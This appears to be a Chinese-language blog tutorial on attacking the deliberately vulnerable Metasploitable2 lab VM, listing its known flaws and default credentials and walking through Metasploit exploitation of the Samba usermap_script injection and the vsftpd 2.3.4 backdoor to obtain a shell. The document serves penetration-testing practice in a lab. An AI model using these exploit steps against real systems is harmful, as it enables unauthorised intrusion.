Metasploit -- 攻擊Metasploitable2靶機

為什麼年輕時都會頹廢墮落一段時間,因為現實否定了我們內心的世界觀。。。

---- 網易雲熱評

一、Metasploitable2簡介

Metasploitable2虛擬系統是一個特別製作的ubuntu操作系統,本身設計目的是作為安全工具測試和演示常見漏洞攻擊的環境。其中最重要的是可以用來作為MSF攻擊用的靶機。

開放了很多的高危端口如21、23、445等,而且具有很多未打補丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且對外開放了很多服務,並且數據庫允許外聯等。系統中的用戶口令均為弱口令。系統搭載了DVWA、Mutillidae等Web漏洞演練平臺。

Metasploit able 2是一個虛擬機文件, 從網上下載解壓之後就可以直接使用,不需要自己安裝。

下載地址:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

用戶名:msfadmin 密碼:msfadmin

二、Metasploitable2漏洞列表

1、弱口令漏洞(如vnc、mysql、PostgreSQL等)

2、Samba MS-RPC Shell命令注入漏洞

3、Vsftpd源碼包後門漏洞

4、UnreallRCd後門漏洞

5、Linux NFS共享目錄配置漏洞

6、Java RMI SERVER命令執行漏洞

7、Tomcat管理臺默認口令漏洞

8、root用戶弱口令漏洞(SSH爆破)

9、Distcc後門漏洞

10、Samba sysmlink默認配置目錄遍歷漏洞

11、PHP CGI參數注入執行漏洞

12、DRuby遠程代碼執行漏洞

13、Ingreslock後門漏洞

14、Rlogin後門漏洞


三、Samba MS-RPC Shell命令注入漏洞

漏洞產生原因:傳遞通過MS-RPC提供的未過濾的用戶 輸入在調用定義的外部腳本時調用/bin/sh,在smb.conf中,導致允許遠程命令執行。

攻擊機:kali linux IP:192.168.1.133

靶機:Metasploitable2 IP:192.168.1.131

1、啟動數據庫並且打開metasploit控制檯:msfconsole

Metasploit -- 攻擊Metasploitable2靶機

2、搜索可利用的模塊:search samba

Metasploit -- 攻擊Metasploitable2靶機

3、選擇要利用的模塊:use exploit/multi/samba/usermap_script

查看需要設置的參數:show options

需要設置目標ip和端口(默認139)

Metasploit -- 攻擊Metasploitable2靶機


4、設置目標主機地址:192.168.1.131

Metasploit -- 攻擊Metasploitable2靶機

5、運行:run 此時已建立shell連接

Metasploit -- 攻擊Metasploitable2靶機

6、查看目標主機目錄文件:ls

Metasploit -- 攻擊Metasploitable2靶機


四、Vsftpd源碼包後門漏洞

漏洞產生原因:在特定版本的vsftpd服務器程序中, 被人惡意植入代碼,當用戶名以“:)”為結尾,服務器就會在6200端口監聽,並且能夠執行任意惡意代碼。

攻擊機:kali linux IP:192.168.1.133

靶機:Metasploitable2 IP:192.168.1.136

1、搜索可用攻擊模塊:search vsftpd

Metasploit -- 攻擊Metasploitable2靶機


2、選擇要利用的模塊:useexploit/unix/ftp/vsftpd_234_backdoor

查看需要設置的參數:show options

需要設置目標ip和端口(默認21)

Metasploit -- 攻擊Metasploitable2靶機


3、設置目標主機地址:192.168.1.136

Metasploit -- 攻擊Metasploitable2靶機

4、 運行:run 此時已建立shell連接

Metasploit -- 攻擊Metasploitable2靶機

5、查看目標主機目錄文件:ls

Metasploit -- 攻擊Metasploitable2靶機


禁止非法,後果自負


分享到:


相關文章: